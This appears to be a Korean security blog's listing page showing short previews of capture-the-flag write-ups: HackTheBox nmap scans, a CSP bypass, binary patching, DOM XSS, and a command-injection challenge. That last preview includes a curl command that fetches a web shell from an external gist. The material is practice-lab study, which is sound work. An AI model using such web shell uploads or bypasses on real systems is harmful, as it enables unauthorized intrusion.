본문 바로가기

STUDY46

[HTB]ypuffy(other, medium) ┌─[eu-dedivip-2]─[10.10.14.60]─[chaem@htb-olmor7nozf]─[~]└──╼ [★]$ nmap -n -sV --script "ldap* and not brute" ypuffy.htbStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-12 06:23 CDTNmap scan report for ypuffy.htb (10.129.196.45)Host is up (0.076s latency).Not shown: 995 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.7 (protocol 2.0)80/tcp open .. 2024. 8. 12.
[HTB] SecNotes ┌─[root@htb-kglh74yzbw]─[/home/chaem]└──╼ #nmap -sT -p- --min-rate 10000 10.129.187.77Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-06 09:31 CDTNmap scan report for 10.129.187.77Host is up (0.076s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE80/tcp open http445/tcp open microsoft-ds8808/tcp open ssports-bcast옵션에따라 8808이 안나오는 경우가 있었다. 8808에는 IIS 서비.. 2024. 8. 7.
[Dreamhack] CSP Bypass(web,2) CSP를 우회하는 문제@app.after_requestdef add_header(response): global nonce response.headers[ "Content-Security-Policy" ] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'" nonce = os.urandom(16).hex() return responseCSP 설정을 보고 뭘 의미하는 지 파악self : 페이지의 현재 출처 (Origin) 내에서 로드하는 리소스만 허용합니다.flag 메뉴에서 source를 자기 자신으로.. 2024. 7. 13.
[Dreamhack] Long Sleep(rev, 2) 바이너리를 실행하면 한줄만 출력하고 계속 멈춰있다. 뭘 입력하거나, 연산해야하는 것이 아닌 바이너리 패치를 통해 문제를 풀어야 하는 듯 하다. sleep이 걸려 있는 것 같은데, sleep 함수를 직접 쓰진 않는 것 같다.IDA로 코드를 보다가, nanosleep을 호출하는 systemcall을 찾았다. 이 부분을 우회에 주면 되는 것으로 보인다.nanosleep 이 있는 함수를 호출하는 아래 if 문에 들어가지 않도록 설정해주려한다.디버거로 실행해서 값을 바꿔주고, 이어서 실행되도록하니 flag가 출력되었다. 2024. 7. 10.
[WEB] DOM XSS https://dreamhack.io/wargame/challenges/438 DOM XSSDescription Exercise: DOM XSS에서 실습하는 문제입니다. 문제 수정 내역 2023.08.11 Dockerfile 제공dreamhack.io #!/usr/bin/python3from flask import Flask, request, render_templatefrom selenium import webdriverfrom selenium.webdriver.chrome.service import Serviceimport urllibimport osapp = Flask(__name__)app.secret_key = os.urandom(32)nonce = os.urandom(16).hex()try: .. 2024. 7. 9.
[WEB] Switching Command 웹 페이지에 접속! username에 값들을 넣어보았다. 문자열을 넣으면 JSON형식으로 입력하라고 나오고, 숫자는 그냥 들어감. 이것저것 해보다가 웹 소스코드가 있다는 것을 잊었다는 게 생각났다.index.php에서 admin으로 로그인하는 방법을 유추할 수 있다사용자의 입력 값을 JSON 형태로 파싱하기 때문에 boolean 타입을 값으로 설정할 수 있다고 한다.JSON 형태로 username을 넣어준다.test.php 에서 cmd 파라미터에 웹쉘을 업로드한다.(curl "https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/50008b4501ccb7f804a61bc2e1a3d1df1cb403c4/easy-s.. 2024. 6. 23.
반응형